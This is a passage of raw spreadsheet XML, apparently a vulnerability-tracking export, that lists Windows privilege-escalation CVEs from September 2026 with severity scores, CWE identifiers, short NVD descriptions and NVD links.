allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t></is></c></row><row r="904"><c r="A904" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C904" s="5" t="inlineStr"><is><t>CVE-2026-69281</t></is></c><c r="D904" s="5" t="n"><v>7</v></c><c r="E904" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G904" s="5" t="inlineStr" /><c r="H904" s="5" t="n"><v>0.003</v></c><c r="I904" s="5" t="inlineStr" /><c r="J904" s="5" t="inlineStr" /><c r="K904" s="5" t="inlineStr" /><c r="L904" s="5" t="inlineStr" /><c r="M904" s="5" t="inlineStr" /><c r="N904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P904" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q904" s="5" t="inlineStr" /><c r="R904" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S904" s="5" t="inlineStr"><is><t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t></is></c></row><row r="905"><c r="A905" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C905" s="5" t="inlineStr"><is><t>CVE-2026-69287</t></is></c><c r="D905" s="5" t="n"><v>7</v></c><c r="E905" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G905" s="5" t="inlineStr" /><c r="H905" s="5" t="n"><v>0.002</v></c><c r="I905" s="5" t="inlineStr" /><c r="J905" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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05" s="5" t="inlineStr" /><c r="M905" s="5" t="inlineStr" /><c r="N905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P905" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q905" s="5" t="inlineStr" /><c r="R905" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S905" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t></is></c></row><row r="906"><c r="A906" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C906" s="5" t="inlineStr"><is><t>CVE-2026-69292</t></is></c><c r="D906" s="5" t="n"><v>7</v></c><c r="E906" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G906" s="5" t="inlineStr" /><c r="H906" s="5" t="n"><v>0.002</v></c><c r="I906" s="5" t="inlineStr" /><c r="J906" s="5" t="inlineStr" /><c r="K906" s="5" t="inlineStr" /><c r="L906" s="5" t="inlineStr" /><c r="M906" s="5" t="inlineStr" /><c r="N906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P906" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q906" s="5" t="inlineStr" /><c r="R906" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S906" s="5" t="inlineStr"><is><t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t></is></c></row><row r="907"><c r="A907" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C907" s="5" t="inlineStr"><is><t>CVE-2026-69299</t></is></c><c r="D907" s="5" t="n"><v>7</v></c><c r="E907" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G907" s="5" t="inlineStr" /><c r="H907" s="5" t="n"><v>0.002</v></c><c r="I907" s="5" t="inlineStr" /><c r="J907" s="5" t="inlineStr" /><c r="K907" s="5" t="inlineStr" /><c r="L907" s="5" t="inlineStr" /><c r="M907" s="5" t="inlineStr" /><c r="N907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P907" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q907" s="5" t="inlineStr" /><c r="R907" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S907" s="5" t="inlineStr"><is><t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t></is></c></row><row r="908"><c r="A908" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C908" s="5" t="inlineStr"><is><t>CVE-2026-69300</t></is></c><c r="D908" s="5" t="n"><v>7</v></c><c r="E908" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G908" s="5" t="inlineStr" /><c r="H908" s="5" t="n"><v>0.002</v></c><c r="I908" s="5" t="inlineStr" /><c r="J908" s="5" t="inlineStr" /><c r="K908" s="5" t="inlineStr" /><c r="L908" s="5" t="inlineStr" /><c r="M908" s="5" t="inlineStr" /><c r="N908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P908" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q908" s="5" t="inlineStr" /><c r="R908" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S908" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t></is></c></row><row r="909"><c r="A909" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C909" s="5" t="inlineStr"><is><t>CVE-2026-69309</t></is></c><c r="D909" s="5" t="n"><v>7</v></c><c r="E909" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G909" s="5" t="inlineStr" /><c r="H909" s="5" t="n"><v>0.003</v></c><c r="I909" s="5" t="inlineStr" /><c r="J909" s="5" t="inlineStr" /><c r="K909" s="5" t="inlineStr" /><c r="L909" s="5" t="inlineStr" /><c r="M909" s="5" t="inlineStr" /><c r="N909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P909" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q909" s="5" t="inlineStr" /><c r="R909" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S909" s="5" t="inlineStr"><is><t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t></is></c></row><row r="910"><c r="A910" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C910" s="5" t="inlineStr"><is><t>CVE-2026-69310</t></is></c><c r="D910" s="5" t="n"><v>7</v></c><c r="E910" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G910" s="5" t="inlineStr" /><c r="H910" s="5" t="n"><v>0.003</v></c><c r="I910" s="5" t="inlineStr" /><c r="J910" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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10" s="5" t="inlineStr" /><c r="M910" s="5" t="inlineStr" /><c r="N910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P910" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q910" s="5" t="inlineStr" /><c r="R910" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S910" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t></is></c></row><row r="911"><c r="A911" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C911" s="5" t="inlineStr"><is><t>CVE-2026-69311</t></is></c><c r="D911" s="5" t="n"><v>7</v></c><c r="E911" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G911" s="5" t="inlineStr" /><c r="H911" s="5" t="n"><v>0.003</v></c><c r="I911" s="5" t="inlineStr" /><c r="J911" s="5" t="inlineStr" /><c r="K911" s="5" t="inlineStr" /><c r="L911" s="5" t="inlineStr" /><c r="M911" s="5" t="inlineStr" /><c r="N911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P911" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q911" s="5" t="inlineStr" /><c r="R911" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S911" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t></is></c></row><row r="912"><c r="A912" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C912" s="5" t="inlineStr"><is><t>CVE-2026-69319</t></is></c><c r="D912" s="5" t="n"><v>7</v></c><c r="E912" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G912" s="5" t="inlineStr" /><c r="H912" s="5" t="n"><v>0.002</v></c><c r="I912" s="5" t="inlineStr" /><c r="J912" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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12" s="5" t="inlineStr" /><c r="M912" s="5" t="inlineStr" /><c r="N912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P912" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q912" s="5" t="inlineStr" /><c r="R912" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S912" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t></is></c></row><row r="913"><c r="A913" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C913" s="5" t="inlineStr"><is><t>CVE-2026-69331</t></is></c><c r="D913" s="5" t="n"><v>7</v></c><c r="E913" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G913" s="5" t="inlineStr" /><c r="H913" s="5" t="n"><v>0.002</v></c><c r="I913" s="5" t="inlineStr" /><c r="J913" s="5" t="inlineStr" /><c r="K913" s="5" t="inlineStr" /><c r="L913" s="5" t="inlineStr" /><c r="M913" s="5" t="inlineStr" /><c r="N913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P913" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q913" s="5" t="inlineStr" /><c r="R913" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S913" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t></is></c></row><row r="914"><c r="A914" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C914" s="5" t="inlineStr"><is><t>CVE-2026-69333</t></is></c><c r="D914" s="5" t="n"><v>7</v></c><c r="E914" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G914" s="5" t="inlineStr" /><c r="H914" s="5" t="n"><v>0.003</v></c><c r="I914" s="5" t="inlineStr" /><c r="J914" s="5" t="inlineStr" /><c r="K914" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L914" s="5" t="inlineStr" /><c r="M914" s="5" t="inlineStr" /><c r="N914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P914" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q914" s="5" t="inlineStr" /><c r="R914" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S914" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t></is></c></row><row r="915"><c r="A915" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C915" s="5" t="inlineStr"><is><t>CVE-2026-69335</t></is></c><c r="D915" s="5" t="n"><v>7</v></c><c r="E915" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G915" s="5" t="inlineStr" /><c r="H915" s="5" t="n"><v>0.003</v></c><c r="I915" s="5" t="inlineStr" /><c r="J915" s="5" t="inlineStr" /><c r="K915" s="5" t="inlineStr" /><c r="L915" s="5" t="inlineStr" /><c r="M915" s="5" t="inlineStr" /><c r="N915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P915" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q915" s="5" t="inlineStr" /><c r="R915" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S915" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t></is></c></row><row r="916"><c r="A916" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C916" s="5" t="inlineStr"><is><t>CVE-2026-69341</t></is></c><c r="D916" s="5" t="n"><v>7</v></c><c r="E916" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G916" s="5" t="inlineStr" /><c r="H916" s="5" t="n"><v>0.003</v></c><c r="I916" s="5" t="inlineStr" /><c r="J916" s="5" t="inlineStr" /><c r="K916" s="5" t="inlineStr" /><c r="L916" s="5" t="inlineStr" /><c r="M916" s="5" t="inlineStr" /><c r="N916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P916" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q916" s="5" t="inlineStr" /><c r="R916" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S916" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t></is></c></row><row r="917"><c r="A917" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C917" s="5" t="inlineStr"><is><t>CVE-2026-69362</t></is></c><c r="D917" s="5" t="n"><v>7</v></c><c r="E917" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G917" s="5" t="inlineStr" /><c r="H917" s="5" t="n"><v>0.003</v></c><c r="I917" s="5" t="inlineStr" /><c r="J917" s="5" t="inlineStr" /><c r="K917" s="5" t="inlineStr" /><c r="L917" s="5" t="inlineStr" /><c r="M917" s="5" t="inlineStr" /><c r="N917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P917" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q917" s="5" t="inlineStr" /><c r="R917" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S917" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t></is></c></row><row r="918"><c r="A918" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B918" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C918" s="5" t="inlineStr"><is><t>CVE-2026-69379</t></is></c><c r="D918" s="5" t="n"><v>7</v></c><c r="E918" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F918" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G918" s="5" t="inlineStr" /><c r="H918" s="5" t="n"><v>0.003</v></c><c r="I918" s="5" t="inlineStr" /><c r="J918" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K918" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L918" s="5" t="inlineStr" /><c r="M918" s="5" t="inlineStr" /><c r="N918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O918" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P918" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q918" s="5" t="inlineStr" /><c r="R918" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S918" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T918" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t></is></c></row><row r="919"><c r="A919" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C919" s="5" t="inlineStr"><is><t>CVE-2026-69383</t></is></c><c r="D919" s="5" t="n"><v>7</v></c><c r="E919" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G919" s="5" t="inlineStr" /><c r="H919" s="5" t="n"><v>0.002</v></c><c r="I919" s="5" t="inlineStr" /><c r="J919" s="5" t="inlineStr" /><c r="K919" s="5" t="inlineStr" /><c r="L919" s="5" t="inlineStr" /><c r="M919" s="5" t="inlineStr" /><c r="N919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P919" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q919" s="5" t="inlineStr" /><c r="R919" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S919" s="5" t="inlineStr"><is><t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t></is></c></row><row r="920"><c r="A920" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C920" s="5" t="inlineStr"><is><t>CVE-2026-69385</t></is></c><c r="D920" s="5" t="n"><v>7</v></c><c r="E920" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G920" s="5" t="inlineStr" /><c r="H920" s="5" t="n"><v>0.002</v></c><c r="I920" s="5" t="inlineStr" /><c r="J920" s="5" t="inlineStr" /><c r="K920" s="5" t="inlineStr" /><c r="L920" s="5" t="inlineStr" /><c r="M920" s="5" t="inlineStr" /><c r="N920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P920" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q920" s="5" t="inlineStr" /><c r="R920" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S920" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t></is></c></row><row r="921"><c r="A921" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C921" s="5" t="inlineStr"><is><t>CVE-2026-69388</t></is></c><c r="D921" s="5" t="n"><v>7</v></c><c r="E921" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G921" s="5" t="inlineStr" /><c r="H921" s="5" t="n"><v>0.003</v></c><c r="I921" s="5" t="inlineStr" /><c r="J921" s="5" t="inlineStr" /><c r="K921" s="5" t="inlineStr" /><c r="L921" s="5" t="inlineStr" /><c r="M921" s="5" t="inlineStr" /><c r="N921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P921" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q921" s="5" t="inlineStr" /><c r="R921" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S921" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t></is></c></row><row r="922"><c r="A922" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C922" s="5" t="inlineStr"><is><t>CVE-2026-69394</t></is></c><c r="D922" s="5" t="n"><v>7</v></c><c r="E922" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G922" s="5" t="inlineStr" /><c r="H922" s="5" t="n"><v>0.003</v></c><c r="I922" s="5" t="inlineStr" /><c r="J922" s="5" t="inlineStr" /><c r="K922" s="5" t="inlineStr" /><c r="L922" s="5" t="inlineStr" /><c r="M922" s="5" t="inlineStr" /><c r="N922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P922" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q922" s="5" t="inlineStr" /><c r="R922" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S922" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t></is></c></row><row r="923"><c r="A923" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C923" s="5" t="inlineStr"><is><t>CVE-2026-69398</t></is></c><c r="D923" s="5" t="n"><v>7</v></c><c r="E923" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G923" s="5" t="inlineStr" /><c r="H923" s="5" t="n"><v>0.002</v></c><c r="I923" s="5" t="inlineStr" /><c r="J923" s="5" t="inlineStr" /><c r="K923" s="5" t="inlineStr" /><c r="L923" s="5" t="inlineStr" /><c r="M923" s="5" t="inlineStr" /><c r="N923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P923" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q923" s="5" t="inlineStr" /><c r="R923" s="5" t="inlineStr"><is><t>CWE-362, CWE-415</t></is></c><c r="S923" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t></is></c></row><row r="924"><c r="A924" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C924" s="5" t="inlineStr"><is><t>CVE-2026-69401</t></is></c><c r="D924" s="5" t="n"><v>7</v></c><c r="E924" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G924" s="5" t="inlineStr" /><c r="H924" s="5" t="n"><v>0.002</v></c><c r="I924" s="5" t="inlineStr" /><c r="J924" s="5" t="inlineStr" /><c r="K924" s="5" t="inlineStr" /><c r="L924" s="5" t="inlineStr" /><c r="M924" s="5" t="inlineStr" /><c r="N924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P924" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q924" s="5" t="inlineStr" /><c r="R924" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S924" s="5" t="inlineStr"><is><t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t></is></c></row><row r="925"><c r="A925" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C925" s="5" t="inlineStr"><is><t>CVE-2026-69404</t></is></c><c r="D925" s="5" t="n"><v>7</v></c><c r="E925" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G925" s="5" t="inlineStr" /><c r="H925" s="5" t="n"><v>0.002</v></c><c r="I925" s="5" t="inlineStr" /><c r="J925" s="5" t="inlineStr" /><c r="K925" s="5" t="inlineStr" /><c r="L925" s="5" t="inlineStr" /><c r="M925" s="5" t="inlineStr" /><c r="N925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P925" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q925" s="5" t="inlineStr" /><c r="R925" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S925" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t></is></c></row><row r="926"><c r="A926" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C926" s="5" t="inlineStr"><is><t>CVE-2026-69410</t></is></c><c r="D926" s="5" t="n"><v>7</v></c><c r="E926" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F926" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G926" s="5" t="inlineStr" /><c r="H926" s="5" t="n"><v>0.003</v></c><c r="I926" s="5" t="inlineStr" /><c r="J926" s="5" t="inlineStr" /><c r="K926" s="5" t="inlineStr" /><c r="L926" s="5" t="inlineStr" /><c r="M926" s="5" t="inlineStr" /><c r="N926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P926" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q926" s="5" t="inlineStr" /><c r="R926" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S926" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T926" s="6" 